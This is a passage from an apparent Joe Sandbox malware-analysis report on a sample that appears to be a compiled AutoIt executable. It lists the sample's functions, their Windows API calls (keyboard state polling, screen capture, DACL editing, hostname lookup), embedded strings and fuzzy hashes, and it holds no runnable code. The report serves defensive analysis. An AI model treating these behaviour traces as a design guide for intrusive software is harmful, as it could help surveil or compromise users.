                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                          • String ID: :$\$\??\%s
                                          • API String ID: 2733774712-3457252023
                                          • Opcode ID: 355c8da239bef3324a070bff71b80ca66d44ca06516359eefa660e395a7a36f3
                                          • Instruction ID: b60b23c30ba9d944af3d3951cd7dbdbcfcc4c4ca7dc825bee3448d7c8916f1a9
                                          • Opcode Fuzzy Hash: 355c8da239bef3324a070bff71b80ca66d44ca06516359eefa660e395a7a36f3
                                          • Instruction Fuzzy Hash: 6B3180B5500209ABDB219FA1DC49FEB77BCEF88705F1441B6FA48E6160E7709684CB25
                                          Function 00E283F4 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00E2874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00E28766
                                            • Part of subcall function 00E2874A: GetLastError.KERNEL32(?,00E2822A,?,?,?), ref: 00E28770
                                            • Part of subcall function 00E2874A: GetProcessHeap.KERNEL32(00000008,?,?,00E2822A,?,?,?), ref: 00E2877F
                                            • Part of subcall function 00E2874A: RtlAllocateHeap.NTDLL(00000000,?,00E2822A), ref: 00E28786
                                            • Part of subcall function 00E2874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00E2879D
                                            • Part of subcall function 00E287E7: GetProcessHeap.KERNEL32(00000008,00E28240,00000000,00000000,?,00E28240,?), ref: 00E287F3
                                            • Part of subcall function 00E287E7: RtlAllocateHeap.NTDLL(00000000,?,00E28240), ref: 00E287FA
                                            • Part of subcall function 00E287E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00E28240,?), ref: 00E2880B
                                          • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00E28458
                                          • _memset.LIBCMT ref: 00E2846D
                                          • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00E2848C
                                          • GetLengthSid.ADVAPI32(?), ref: 00E2849D
                                          • GetAce.ADVAPI32(?,00000000,?), ref: 00E284DA
                                          • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00E284F6
                                          • GetLengthSid.ADVAPI32(?), ref: 00E28513
                                          • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00E28522
                                          • RtlAllocateHeap.NTDLL(00000000), ref: 00E28529
                                          • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00E2854A
                                          • CopySid.ADVAPI32(00000000), ref: 00E28551
                                          • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00E28582
                                          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00E285A8
                                          • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00E285BC
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                          • String ID:
                                          • API String ID: 2347767575-0
                                          • Opcode ID: 70a558c09f1d3096c48808269c66598eaee3eaf8c972bcab4af21cd16ae2ef69
                                          • Instruction ID: 7d3680ffb17c8f71a52c7bb56f278c8aa68b78004a8ca0f76a87e0257b70742f
                                          • Opcode Fuzzy Hash: 70a558c09f1d3096c48808269c66598eaee3eaf8c972bcab4af21cd16ae2ef69
                                          • Instruction Fuzzy Hash: 5861587190122AAFDF04DFA1ED44AAEBBB9FF04305F088529E815B7291DB349A04CF60
                                          Function 00E4762D Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetDC.USER32(00000000), ref: 00E476A2
                                          • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00E476AE
                                          • CreateCompatibleDC.GDI32(?), ref: 00E476BA
                                          • SelectObject.GDI32(00000000,?), ref: 00E476C7
                                          • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00E4771B
                                          • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00E47757
                                          • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00E4777B
                                          • SelectObject.GDI32(00000006,?), ref: 00E47783
                                          • DeleteObject.GDI32(?), ref: 00E4778C
                                          • DeleteDC.GDI32(00000006), ref: 00E47793
                                          • ReleaseDC.USER32(00000000,?), ref: 00E4779E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                          • String ID: (
                                          • API String ID: 2598888154-3887548279
                                          • Opcode ID: 76f0b688848c787436076eebeb9ccc5081bab6ab362286fbc114029bb789bb08
                                          • Instruction ID: 6f4358389b791aa30461b8bdb72bb7b53df419253a9ee89b7c9dbf42a93e2d59
                                          • Opcode Fuzzy Hash: 76f0b688848c787436076eebeb9ccc5081bab6ab362286fbc114029bb789bb08
                                          • Instruction Fuzzy Hash: 56514B75904309EFCB15CFA9DC85EAEBBB9EF48311F14852DF989A7250D731A844CBA0
                                          Function 00DD6BEC Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00DF0B9B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00DD6C6C,?,00008000), ref: 00DF0BB7
                                            • Part of subcall function 00DD48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00DD48A1,?,?,00DD37C0,?), ref: 00DD48CE
                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00DD6D0D
                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00DD6E5A
                                            • Part of subcall function 00DD59CD: _wcscpy.LIBCMT ref: 00DD5A05
                                            • Part of subcall function 00DF387D: _iswctype.LIBCMT ref: 00DF3885
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                          • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                          • API String ID: 537147316-1018226102
                                          • Opcode ID: cfd5172e480ca3b5e1f79a95edd5260e3bfad620f59fe20cc5b4f29ccb2caa37
                                          • Instruction ID: 706d2673b928d4e3fc62f5bef7c87c0ad296cdd45e763b753b1f6e059e2e7a97
                                          • Opcode Fuzzy Hash: cfd5172e480ca3b5e1f79a95edd5260e3bfad620f59fe20cc5b4f29ccb2caa37
                                          • Instruction Fuzzy Hash: CA026D711083419FC724EF24C891AAFBBE5EF98354F14492EF496A73A1DB30D949CB62
                                          Function 00DD45DF Relevance: 19.7, APIs: 13, Instructions: 215windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • _memset.LIBCMT ref: 00DD45F9
                                          • GetMenuItemCount.USER32(00E96890), ref: 00E0D7CD
                                          • GetMenuItemCount.USER32(00E96890), ref: 00E0D87D
                                          • GetCursorPos.USER32(?), ref: 00E0D8C1
                                          • SetForegroundWindow.USER32(00000000), ref: 00E0D8CA
                                          • TrackPopupMenuEx.USER32(00E96890,00000000,?,00000000,00000000,00000000), ref: 00E0D8DD
                                          • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00E0D8E9
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
                                          • String ID:
                                          • API String ID: 2751501086-0
                                          • Opcode ID: 5af89d2e63aba5f345f2936a25d92d263dfc07e936d232c9a55a2acaf53d1497
                                          • Instruction ID: 3d4c8552f4684522b986effa79bea3207fb9f496decd622d9dd2f8db9cb0bb4b
                                          • Opcode Fuzzy Hash: 5af89d2e63aba5f345f2936a25d92d263dfc07e936d232c9a55a2acaf53d1497
                                          • Instruction Fuzzy Hash: 85710130604205BFEB248F94DC89FAABF64FF04368F244217F615B62E0C7B1A850DBA4
                                          Function 00E510A5 Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON
                                          Download Yara Rule
                                          APIs
                                          • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00E50038,?,?), ref: 00E510BC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: BuffCharUpper
                                          • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                          • API String ID: 3964851224-909552448
                                          • Opcode ID: ef9f19fb03fa2b16207d2fbcb361d4f2def17e36636592aae28ec2fcd00766d2
                                          • Instruction ID: 7d5fc895e978f3f1e453a15cbe93e98b14416a985cdd77ca60d3d1b894b6a400
                                          • Opcode Fuzzy Hash: ef9f19fb03fa2b16207d2fbcb361d4f2def17e36636592aae28ec2fcd00766d2
                                          • Instruction Fuzzy Hash: 2F415B3015524E8BCF20EF90DD91AEA3B24EF52305F506895ED956B6A2DB30AD1ACB70
                                          Function 00E35569 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00DD7D2C: _memmove.LIBCMT ref: 00DD7D66
                                            • Part of subcall function 00DD7A84: _memmove.LIBCMT ref: 00DD7B0D
                                          • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00E355D2
                                          • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00E355E8
                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00E355F9
                                          • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00E3560B
                                          • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00E3561C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: SendString$_memmove
                                          • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                          • API String ID: 2279737902-1007645807
                                          • Opcode ID: 08c7709982f98761f6f3f1d689ff4e2d3796bfd86b66a2bcc1853beaa2da4b5d
                                          • Instruction ID: 4b12af0cdce2b17fb06db9cc76a915d1bf8addeb3d41f733973d6488010b2461
                                          • Opcode Fuzzy Hash: 08c7709982f98761f6f3f1d689ff4e2d3796bfd86b66a2bcc1853beaa2da4b5d
                                          • Instruction Fuzzy Hash: 4911542159066A79E720B661DC4ADFF7F7CEF95B00F44147BB409B21D1EE601E05C6B1
                                          Function 00E348F3 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                          • String ID: 0.0.0.0
                                          • API String ID: 208665112-3771769585
                                          • Opcode ID: 752ff3c9d09068d6e60f046a0925a2927008d170711f0944b5ffd938fa7d1778
                                          • Instruction ID: e889524f77416f94dbf6e60d9423ece4201d5376fbb578c7f398c75cfcc2b602
                                          • Opcode Fuzzy Hash: 752ff3c9d09068d6e60f046a0925a2927008d170711f0944b5ffd938fa7d1778
                                          • Instruction Fuzzy Hash: F0110871904219AFCB24EB21AC4AFEB7BBCDF40711F054176F504B2191EF709985C671
                                          Function 00E35217 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • timeGetTime.WINMM ref: 00E3521C
                                            • Part of subcall function 00DF0719: timeGetTime.WINMM(?,75A8B400,00DE0FF9), ref: 00DF071D
                                          • Sleep.KERNEL32(0000000A), ref: 00E35248
                                          • EnumThreadWindows.USER32(?,Function_000651CA,00000000), ref: 00E3526C
                                          • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00E3528E
                                          • SetActiveWindow.USER32 ref: 00E352AD
                                          • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00E352BB
                                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 00E352DA
                                          • Sleep.KERNEL32(000000FA), ref: 00E352E5
                                          • IsWindow.USER32 ref: 00E352F1
                                          • EndDialog.USER32(00000000), ref: 00E35302
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                          • String ID: BUTTON
                                          • API String ID: 1194449130-3405671355
                                          • Opcode ID: b4515f28554864f1d3a3d3a19e68eda3ae19b11bdd030d213b9f9d44c190d4ff
                                          • Instruction ID: 5675ac49a093d1b065fa60f24281e3b6d45a99c47b3b67ff8f68cda9336d0747
                                          • Opcode Fuzzy Hash: b4515f28554864f1d3a3d3a19e68eda3ae19b11bdd030d213b9f9d44c190d4ff
                                          • Instruction Fuzzy Hash: 3C21A471104704AFE7045B32ED8DA263FAAEB4634BF012867F442B22B1DBA19C0CCB61
                                          Function 00E3D7F8 Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00DD9997: __itow.LIBCMT ref: 00DD99C2
                                            • Part of subcall function 00DD9997: __swprintf.LIBCMT ref: 00DD9A0C
                                          • CoInitialize.OLE32(00000000), ref: 00E3D855
                                          • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00E3D8E8
                                          • SHGetDesktopFolder.SHELL32(?), ref: 00E3D8FC
                                          • CoCreateInstance.COMBASE(00E62D7C,00000000,00000001,00E8A89C,?), ref: 00E3D948
                                          • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00E3D9B7
                                          • CoTaskMemFree.COMBASE(?), ref: 00E3DA0F
                                          • _memset.LIBCMT ref: 00E3DA4C
                                          • SHBrowseForFolderW.SHELL32(?), ref: 00E3DA88
                                          • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00E3DAAB
                                          • CoTaskMemFree.COMBASE(00000000), ref: 00E3DAB2
                                          • CoTaskMemFree.COMBASE(00000000), ref: 00E3DAE9
                                          • CoUninitialize.COMBASE ref: 00E3DAEB
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                          • String ID:
                                          • API String ID: 1246142700-0
                                          • Opcode ID: 5e81f07007eebde1945f63cfbefeb02b7fe86f5e6c19cad002351c46f7d80416
                                          • Instruction ID: f3983bf40fc71c484a4fc95c85e8b9311e1cd8eaf9618c8a36607b9fcf67c945
                                          • Opcode Fuzzy Hash: 5e81f07007eebde1945f63cfbefeb02b7fe86f5e6c19cad002351c46f7d80416
                                          • Instruction Fuzzy Hash: E4B1FA75A00219AFDB04DF64D898DAEBBF9EF48304F048469F509EB251DB31ED45CB60
                                          Function 00E3052C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetKeyboardState.USER32(?), ref: 00E305A7
                                          • SetKeyboardState.USER32(?), ref: 00E30612
                                          • GetAsyncKeyState.USER32(000000A0), ref: 00E30632
                                          • GetKeyState.USER32(000000A0), ref: 00E30649
                                          • GetAsyncKeyState.USER32(000000A1), ref: 00E30678
                                          • GetKeyState.USER32(000000A1), ref: 00E30689
                                          • GetAsyncKeyState.USER32(00000011), ref: 00E306B5
                                          • GetKeyState.USER32(00000011), ref: 00E306C3
                                          • GetAsyncKeyState.USER32(00000012), ref: 00E306EC
                                          • GetKeyState.USER32(00000012), ref: 00E306FA
                                          • GetAsyncKeyState.USER32(0000005B), ref: 00E30723
                                          • GetKeyState.USER32(0000005B), ref: 00E30731
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: State$Async$Keyboard
                                          • String ID:
                                          • API String ID: 541375521-0
                                          • Opcode ID: 9db2c4379cba8684a50a332326cff94f8b3620b0beff1fd42784180b548c6be2
                                          • Instruction ID: 4bf50921d738a0fa7e8cd83fc06eb6db13ac48f6be3820936d9469bb0f9c7d52
                                          • Opcode Fuzzy Hash: 9db2c4379cba8684a50a332326cff94f8b3620b0beff1fd42784180b548c6be2
                                          • Instruction Fuzzy Hash: 3C511B60A0478829FB35EBB088697EABFF49F01384F08559EC5C2765C2DA64DB4CCB56
                                          Function 00E2C72A Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetDlgItem.USER32(?,00000001), ref: 00E2C746
                                          • GetWindowRect.USER32(00000000,?), ref: 00E2C758
                                          • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00E2C7B6
                                          • GetDlgItem.USER32(?,00000002), ref: 00E2C7C1
                                          • GetWindowRect.USER32(00000000,?), ref: 00E2C7D3
                                          • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00E2C827
                                          • GetDlgItem.USER32(?,000003E9), ref: 00E2C835
                                          • GetWindowRect.USER32(00000000,?), ref: 00E2C846
                                          • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00E2C889
                                          • GetDlgItem.USER32(?,000003EA), ref: 00E2C897
                                          • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00E2C8B4
                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00E2C8C1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Window$ItemMoveRect$Invalidate
                                          • String ID:
                                          • API String ID: 3096461208-0
                                          • Opcode ID: 5dbacea45d3f97981ed04dbd40cf3497430f069d0b79b65077a4656d96da0a1e
                                          • Instruction ID: 48b3c97919ba474987f23e78827676207219fb78b878ad63699555d7c1003ef5
                                          • Opcode Fuzzy Hash: 5dbacea45d3f97981ed04dbd40cf3497430f069d0b79b65077a4656d96da0a1e
                                          • Instruction Fuzzy Hash: 5B513171B00205AFDB18CF69DD89AAEBBBAEB88311F14852DF515E7290D7B0AD448B50
